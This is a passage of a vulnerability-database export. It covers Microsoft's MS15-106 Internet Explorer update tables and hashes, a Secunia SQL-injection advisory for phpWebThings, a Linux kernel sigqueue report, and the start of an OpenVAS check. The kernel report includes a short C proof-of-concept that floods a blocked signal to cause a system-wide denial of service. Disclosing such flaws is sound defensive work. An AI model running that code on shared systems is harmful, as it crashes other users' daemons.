class=\"sbody-td\">For Internet Explorer 9 for all supported x64-based editions of Windows 7:<br/><span class=\"text-base\">IE9-Windows6.1-KB3093983-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 10 for Windows 7 for 32-bit Systems Service Pack 1:<br/><span class=\"text-base\">IE10-Windows6.1-KB3093983-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 10 for Windows 7 for x64-based Systems Service Pack 1:<br/><span class=\"text-base\">IE10-Windows6.1-KB3093983-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 11 for Windows 7 for 32-bit Systems Service Pack 1:<br/><span class=\"text-base\">IE11-Windows6.1-KB3093983-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 11 for Windows 7 for x64-based Systems Service Pack 1:<br/><span class=\"text-base\">IE11-Windows6.1-KB3093983-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See the <a href=\"https://support.microsoft.com/help/3093983\" id=\"kb-link-11\" target=\"_self\">file information</a> section</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">A system restart is required after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch or click <span class=\"text-base\">Control Panel</span>, click <span class=\"text-base\">System and Security</span>, and then under Windows Update, click <span class=\"text-base\">View installed updates</span> and select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See the <a href=\"https://support.microsoft.com/help/3093983\" id=\"kb-link-12\" target=\"_self\">file information</a> section</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> A registry key does not exist to validate the presence of this update.</td></tr></table></div><h4 class=\"sbody-h4\">Windows Server 2008 R2 (all editions)</h4><h5 class=\"sbody-h5 text-subtitle\">Reference Table</h5>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For Internet Explorer 8 in all supported x64-based editions of Windows Server 2008 R2:<br/><span class=\"text-base\">Windows6.1-KB3093983-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 8 in all supported Itanium-based editions of Windows Server 2008 R2:<br/><span class=\"text-base\">Windows6.1-KB3093983-ia64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 9 for all supported x64-based editions of Windows Server 2008 R2:<br/><span class=\"text-base\">IE9-Windows6.1-KB3093983-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 10 for Windows Server 2008 R2 for x64-based Systems Service Pack 1:<br/><span class=\"text-base\">IE10-Windows6.1-KB3093983-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 11 for Windows Server 2008 R2 for x64-based Systems Service Pack 1:<br/><span class=\"text-base\">IE11-Windows6.1-KB3093983-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-13\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">A system restart is required after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch or click <span class=\"text-base\">Control Panel</span>, click <span class=\"text-base\">System and Security</span>, and then under Windows Update, click <span class=\"text-base\">View installed updates</span> and select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See the <a href=\"https://support.microsoft.com/help/3093983\" id=\"kb-link-14\" target=\"_self\">file information</a> section</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> A registry key does not exist to validate the presence of this update.</td></tr></table></div><h4 class=\"sbody-h4\">Windows 8 and Windows 8.1 (all editions)</h4><h5 class=\"sbody-h5 text-subtitle\">Reference Table</h5>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For Internet Explorer 10 in all supported 32-bit editions of Windows 8:<br/><span class=\"text-base\">Windows8-RT-KB3093983-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 10 in all supported x64-based editions of Windows 8:<br/><span class=\"text-base\">Windows8-RT-KB3093983-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 11 in all supported 32-bit editions of Windows 8.1:<br/><span class=\"text-base\">Windows8.1-KB3093983-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 11 in all supported x64-based editions of Windows 8.1:<br/><span class=\"text-base\">Windows8.1-KB3093983-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-15\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">A system restart is required after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch or click <span class=\"text-base\">Control Panel</span>, click <span class=\"text-base\">System and Security</span>, click <span class=\"text-base\">Windows Update</span>, and then under See also, click <span class=\"text-base\">Installed updates</span> and select from the list of updates<span class=\"text-base\">.</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See the <a href=\"https://support.microsoft.com/help/3093983\" id=\"kb-link-16\" target=\"_self\">file information</a> section</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> A registry key does not exist to validate the presence of this update.</td></tr></table></div><h4 class=\"sbody-h4\">Windows Server 2012 and Windows Server 2012 R2 (all editions)</h4><h5 class=\"sbody-h5 text-subtitle\">Reference Table</h5>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For Internet Explorer 10 in all supported editions of Windows Server 2012:<br/><span class=\"text-base\">Windows8-RT-KB3093983-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 11 in all supported editions of Windows Server 2012 R2:<br/><span class=\"text-base\">Windows8.1-KB3093983-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-17\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">A system restart is required after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch or click <span class=\"text-base\">Control Panel</span>, click <span class=\"text-base\">System and Security</span>, click <span class=\"text-base\">Windows Update</span>, and then under See also, click <span class=\"text-base\">Installed updates</span> and select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See the <a href=\"https://support.microsoft.com/help/3093983\" id=\"kb-link-18\" target=\"_self\">file information</a> section</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> A registry key does not exist to validate the presence of this update.</td></tr></table></div><h4 class=\"sbody-h4\">Windows RT and Windows RT 8.1 (all editions)</h4><h5 class=\"sbody-h5 text-subtitle\">Reference Table</h5>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Deployment</span></td><td class=\"sbody-td\">This update is available through <a href=\"http://go.microsoft.com/fwlink/?linkid=21130\" id=\"kb-link-19\" target=\"_self\">Windows Update</a>.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart Requirement</span></td><td class=\"sbody-td\">A system restart is required after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal Information</span></td><td class=\"sbody-td\">Click <span class=\"text-base\">Control Panel</span>, click <span class=\"text-base\">System and Security</span>, click <span class=\"text-base\">Windows Update</span>, and then under See also, click <span class=\"text-base\">Installed updates</span> and select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">Not applicable</td></tr></table></div><h4 class=\"sbody-h4\">Windows 10 (all editions)</h4><h5 class=\"sbody-h5 text-subtitle\">Reference Table</h5>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For Internet Explorer 11 in all supported 32-bit editions of Windows 10:<br/><span class=\"text-base\">Windows10.0-KB3097617-x86.msu </span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 11 in all supported x64-based editions of Windows 10:<br/><span class=\"text-base\">Windows10.0-KB</span><span class=\"text-base\">3097617</span><span class=\"text-base\">-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft Edge in all supported 32-bit editions of Windows 10:<br/><span class=\"text-base\">Windows10.0-KB3097617-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft Edge in all supported x64-based editions of Windows 10:<br/><span class=\"text-base\">Windows10.0-KB</span><span class=\"text-base\">3097617</span><span class=\"text-base\">-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-20\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">A system restart is required after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch or click <span class=\"text-base\">Control Panel</span>, click <span class=\"text-base\">System and Security</span>, click <span class=\"text-base\">Windows Update</span>, and then under See also, click <span class=\"text-base\">Installed updates</span> and select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3096441\" id=\"kb-link-21\" target=\"_self\">Microsoft Knowledge Base Article 3096441</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> A registry key does not exist to validate the presence of this update.</td></tr></table></div></div><br/></span></div></div></div><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">File hash information</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\"><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">Package Name</th><th class=\"sbody-th\">Package Hash SHA 1</th><th class=\"sbody-th\">Package Hash SHA 2</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE10-Windows6.1-KB3093983-x64.msu</td><td class=\"sbody-td\">0B9B58CB64104F9662935F56CB99B6A02323FA17</td><td class=\"sbody-td\">2F94C4C10631E5AFD164DAE9E4A3DCBF3F3F741E07F7A03D2B50AB59227021BD</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE10-Windows6.1-KB3093983-x86.msu</td><td class=\"sbody-td\">A77226AAF41B8AA212ECB4E8B8B140B183D933D3</td><td class=\"sbody-td\">E019DE27B0C1A5486956FACAF55FFD975ADFDCAC331A4B037280EC8C7B5AE279</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE11-Windows6.1-KB3093983-x64.msu</td><td class=\"sbody-td\">231DD57CB3730A001F830EEA3406FFB77B90EEA4</td><td class=\"sbody-td\">9759D8BD84D4B2EBC29C3FF905180A20BE0278016102F501F985A0E886753C76</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE11-Windows6.1-KB3093983-x86.msu</td><td class=\"sbody-td\">508CA3A62F6849A04F94356A0A166DE06BA0EFF2</td><td class=\"sbody-td\">ADDDB8CBDC0862976753F4C0159AAEA85BEAE27EA523409111D141E4DBAF4554</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-Windows6.0-KB3093983-x64.msu</td><td class=\"sbody-td\">162E55FA682E559E6C809A0782B6F98520B0C0E4</td><td class=\"sbody-td\">9E7F5E316265DC55D21DECA3AE7F4E9C45CD8DACC517E8AAF3C8EEEB8F2457B7</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-Windows6.0-KB3093983-x86.msu</td><td class=\"sbody-td\">8B5C1674384436B68B3D8142661C571C1E394EA0</td><td class=\"sbody-td\">26C75B009CCA8A781AEC3D1F8C6F196EDAF14C19AD92EA2DAA74EE327225B3FA</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE9-Windows6.0-KB3093983-x64.msu</td><td class=\"sbody-td\">E0EC4143B347497D6EC6361B7BD8E40EE77871B1</td><td class=\"sbody-td\">023A75590ADBD44CA953830087218AAD87E5DDF51DCCB28E046CB57359A57132</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE9-Windows6.0-KB3093983-x86.msu</td><td class=\"sbody-td\">B49C2CF0E412DD057FA25D3FD264D57A8091E779</td><td class=\"sbody-td\">D0296270BA75F5D88769D0BC7F10B73094419138E5BFE9378F4DCD80FA9C3C8A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE9-Windows6.1-KB3093983-x64.msu</td><td class=\"sbody-td\">E049C24789D876119FCD1F64D286CCF43DA97C90</td><td class=\"sbody-td\">7CC3879A438C24C3B20FAF1DBCEA6229685233157BF3B90BF788CF6EE44D737E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE9-Windows6.1-KB3093983-x86.msu</td><td class=\"sbody-td\">F224539B662B77C468D01A2BD3CAE88BE72AF175</td><td class=\"sbody-td\">20E24797147C80DCF416C90B2C6ECA9FDAA6BB80434AFBD23B937BACC2C459D8</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.0-KB3093983-ia64.msu</td><td class=\"sbody-td\">F6ECBB9CDDA8397D24838C82ED974433623D59A9</td><td class=\"sbody-td\">8F6AD4AD0CAA9D68CE70E8E7808E3D22579329F3F8E69D5965D5B2D87303E5BD</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.0-KB3093983-x64.msu</td><td class=\"sbody-td\">046BE81682B0980C2D07A31E8BF029C01CC1F5BD</td><td class=\"sbody-td\">6C2552D0B56EF1DAA7B84426384642F828167C55E6214612423543F5CEB984E5</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.0-KB3093983-x86.msu</td><td class=\"sbody-td\">4BF15937FCD152A1BEFAC3DE06B52447B2550464</td><td class=\"sbody-td\">AD1733391FAC0718618483748A7698BAB03C095DEEC219B8530C5C918395CEC0</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.1-KB3093983-ia64.msu</td><td class=\"sbody-td\">1EA93FDA1D4F2B2140B0320437ED73FA65334E48</td><td class=\"sbody-td\">1B0CEBBB317F7CA3F46E300BC91D402F920C792C523A905CB92AAA72564EE32D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.1-KB3093983-x64.msu</td><td class=\"sbody-td\">E9516C5008B44215462B240E316DD05C46E3F54F</td><td class=\"sbody-td\">8FEA72408A03FBC35EA47AC7A2F113213D7A9BB3D22C2F949F92CAC26034D8D2</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.1-KB3093983-x86.msu</td><td class=\"sbody-td\">CE0A6036495130DB57C0E80592B4456305910D41</td><td class=\"sbody-td\">B1EA2ACAF38E1AC027009EDAA3BEF8AFF876292DAD093522AE1B0EA72945B545</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8-RT-KB3093983-x64.msu</td><td class=\"sbody-td\">50A9C28A74F098C01B00E4572BCB1447B40FCF17</td><td class=\"sbody-td\">F5A2B0622E9EAA0E5D69B7B3EB1D5AC5B00AB820384C99252AF2ADCC68AD1DBF</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8-RT-KB3093983-x86.msu</td><td class=\"sbody-td\">BA480D8EB1E37E839466645343D9C330E16CDDEA</td><td class=\"sbody-td\">A3EE15EC7C2F3DE2803FF852D130178A1BC2D8BBC259526B3DF94C2846A5CAC4</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8.1-KB3093983-x64.msu</td><td class=\"sbody-td\">54C9AD8E7C8F71C3C509663466BFD1A1B3F4E0ED</td><td class=\"sbody-td\">E57FD6C79249A7C104E3A601352FECCBD8E65FEE46F31EABF7538E683BC8AB72</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8.1-KB3093983-x86.msu</td><td class=\"sbody-td\">CB8113388EC7E6D444777AC98B40FDB2DBCD5F55</td><td class=\"sbody-td\">6DEABF112CB5C5DD3F41A75C07B0D8DC7E6D38C875F7867A3D63A39FB3E923D3</td></tr></table></div></div><br/></span></div></div></div><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">How to obtain help and support for this security update</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\">Help for installing updates: <a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-22\" target=\"_self\">Support for Microsoft Update</a><br/><br/>Security solutions for IT professionals: <a href=\"https://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-23\" target=\"_self\">TechNet Security Troubleshooting and Support</a><br/><br/>Help for protecting your Windows-based computer from viruses and malware: <a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-24\" target=\"_self\">Virus Solution and Security Center</a><br/><br/>Local support according to your country: <a href=\"https://support.microsoft.com/common/international.aspx\" id=\"kb-link-25\" target=\"_self\">International Support</a></div><br/></span></div></div></div></div></body></html>", "modified": "2015-11-20T22:32:07", "id": "KB3096441", "href": "https://support.microsoft.com/en-us/help/3096441/", "published": "2017-01-07T22:29:59", "title": "MS15-106: Cumulative security update for Internet Explorer: October 13, 2015", "type": "mskb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:02", "bulletinFamily": "software", "description": "Internet Explorer / Edge multiple security vulnerabilities, VBScript / Jscript code execution, Windows Shell code execution, kernel privilege escsalation.", "modified": "2015-10-25T00:00:00", "published": "2015-10-25T00:00:00", "id": "SECURITYVULNS:VULN:14734", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14734", "title": "Microsoft Windows multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:20", "bulletinFamily": "software", "description": "Buffer overflow on oversized command during logging.", "modified": "2006-04-25T00:00:00", "published": "2006-04-25T00:00:00", "id": "SECURITYVULNS:VULN:6047", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:6047", "title": "Quick 'n Easy FTP Server buffer overflow", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:14", "bulletinFamily": "software", "description": "\r\nTITLE:\r\nphpWebThings "forum" SQL Injection Vulnerability\r\n\r\nSECUNIA ADVISORY ID:\r\nSA17410\r\n\r\nVERIFY ADVISORY:\r\nhttp://secunia.com/advisories/17410/\r\n\r\nCRITICAL:\r\nModerately critical\r\n\r\nIMPACT:\r\nManipulation of data\r\n\r\nWHERE:\r\n>From remote\r\n\r\nSOFTWARE:\r\nphpWebThings 0.x\r\nhttp://secunia.com/product/6047/\r\nphpWebThings 1.x\r\nhttp://secunia.com/product/6048/\r\n\r\nDESCRIPTION:\r\nLinux_Drox has discovered a vulnerability in phpWebThings, which can\r\nbe exploited by malicious people to conduct SQL injection attacks.\r\n\r\nInput passed to the "forum" parameter in "forum.php" isn't properly\r\nsanitised before being used in a SQL query. This can be exploited to\r\nmanipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nThe vulnerability has been confirmed in version 1.4 and has also been\r\nreported in version 0.4.4. Other versions may also be affected.\r\n\r\nSOLUTION:\r\nEdit the source code to ensure that input is properly sanitised.\r\n\r\nPROVIDED AND/OR DISCOVERED BY:\r\nLinux_Drox\r\n\r\n----------------------------------------------------------------------\r\n\r\nAbout:\r\nThis Advisory was delivered by Secunia as a free service to help\r\neverybody keeping their systems up to date against the latest\r\nvulnerabilities.\r\n\r\nSubscribe:\r\nhttp://secunia.com/secunia_security_advisories/\r\n\r\nDefinitions: (Criticality, Where etc.)\r\nhttp://secunia.com/about_secunia_advisories/\r\n\r\n\r\nPlease Note:\r\nSecunia recommends that you verify all advisories you receive by\r\nclicking the link.\r\nSecunia NEVER sends attached files with advisories.\r\nSecunia does not advise people to install third party patches, only\r\nuse those supplied by the vendor.\r\n", "modified": "2005-11-04T00:00:00", "published": "2005-11-04T00:00:00", "id": "SECURITYVULNS:DOC:10120", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:10120", "title": "[SA17410] phpWebThings "forum" SQL Injection Vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:09", "bulletinFamily": "software", "description": "Hello.\r\n\r\nWe faced a bug (?) in Linux kernel causing different misbehaviours on our \r\nserver. After exploration, it seems that we found some security \r\nimplications of this issue.\r\n\r\n\r\nWhen a process exits, it's parent is notified by SIGCHLD, and finished \r\nchild is kept in process table in "zombie" state until parent process (or \r\ninit, if parent is already ended) handles child exit.\r\n\r\nSimilary, with linuxthreads, when a thread exits, another thread in the \r\nsame process is notified by signal 33 (SIGRT_1), and exitted thread exists \r\nin the process table in "zombie" state until the exit is handled.\r\n\r\nWhen a signal that notifies about exit is generated by the kernel, kernel \r\ncode allocates a "struct sigqueue" object. This object keeps information \r\nabout the signal until the signal is delivered.\r\n\r\nOnly a limited number of such objects may be allocated at a time.\r\nThere is some code in the kernel that still allows signals with numbers \r\nless than 32 to be delivered when "struct sigqueue" object can't be \r\nallocated. However, for signal 33 signal generation routine just returns \r\n-EAGAIN in this case.\r\nAs the result, process is not notified about thread exits, and ended thread \r\nis left in "zombie" state.\r\nDetails are at \r\nhttp://www.ussg.iu.edu/hypermail/linux/kernel/0404.0/0208.html\r\n\r\nFor long-living processes that create short-living threads (such as \r\nmysqld), this causes process table overflow in several minutes.\r\n\r\n"struct sigqueue" overflow may be easily caused from userspace, if a \r\nprocess blocks a signal and then receives a large number of such signals.\r\nThe following sample code does that:\r\n\r\n#include <signal.h>\r\n#include <unistd.h>\r\n#include <stdlib.h>\r\n \r\nint main()\r\n{\r\n sigset_t set;\r\n int i;\r\n pid_t pid;\r\n\r\n sigemptyset(&set);\r\n sigaddset(&set, 40);\r\n sigprocmask(SIG_BLOCK, &set, 0);\r\n\r\n pid = getpid();\r\n for (i = 0; i < 1024; i++)\r\n kill(pid, 40);\r\n\r\n while (1)\r\n sleep(1);\r\n}\r\n \r\nSo if a user runs such code (or just runs a buggy program that blocks a \r\nsignal and then receives 1000 such signals - which happens here), this \r\nwill cause a DoS againt anything running on the same system that uses \r\nlinuxthreads, including daemons running as root.\r\n\r\nOn systems that use NPTL (such as Linux 2.6 kernel) there is no 'thread \r\nzombie' problem, because in NPTL another notification mechanism is used. \r\nHowever, DoS is still possible (and really happens - in form of daemon \r\ncrashes), because when it is not possible to allocatre a "struct sigqueue" \r\nobject, kernel behaviour in signal-passing changes, causing random hangs \r\nand segfaults in different programs.\r\n", "modified": "2004-04-13T00:00:00", "published": "2004-04-13T00:00:00", "id": "SECURITYVULNS:DOC:6047", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:6047", "title": "Possible DoS on Linux kernel 2.4 and 2.6 using sigqueue overflow.", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:18", "bulletinFamily": "software", "description": "SIGRT_1 signal can be delivired to application causing invalid handling of child threads termination.", "modified": "2004-04-13T00:00:00", "published": "2004-04-13T00:00:00", "id": "SECURITYVULNS:VULN:3598", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:3598", "title": "linux threaded processes DoS", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}], "openvas": [{"lastseen": "2019-05-29T18:36:00", "bulletinFamily": "scanner", "description": "This host is missing a critical security\n update according to Microsoft Bulletin MS15-106.", "modified": "2019-05-20T00:00:00", "published": "2015-10-14T00:00:00", "id": "OPENVAS:1361412562310805761", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805761", "title": "Microsoft Internet Explorer Multiple Vulnerabilities (3096441)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ms15-106.nasl 2015-10-14 10:03:00 +0530 Oct$\n#\n# Microsoft Internet Explorer Multiple Vulnerabilities (3096441)\n#\n# Authors:\n# Deependra Bapna <bdeependra@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:microsoft:ie\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805761\");\n script_version(\"2019-05-20T11:12:48+0000\");\n script_cve_id(\"CVE-2015-2482\", \"CVE-2015-6042\", \"CVE-2015-6044\", \"CVE-2015-6046\",\n \"CVE-2015-6047\", \"CVE-2015-6048\", \"CVE-2015-6049\", \"CVE-2015-6050\",\n \"CVE-2015-6051\", \"CVE-2015-6052\", \"CVE-2015-6053\", \"CVE-2015-6055\",\n \"CVE-2015-6056\", \"CVE-2015-6059\", \"CVE-2015-6184\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-20 11:12:48 +0000 (Mon, 20 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-10-14 10:03:00 +0530 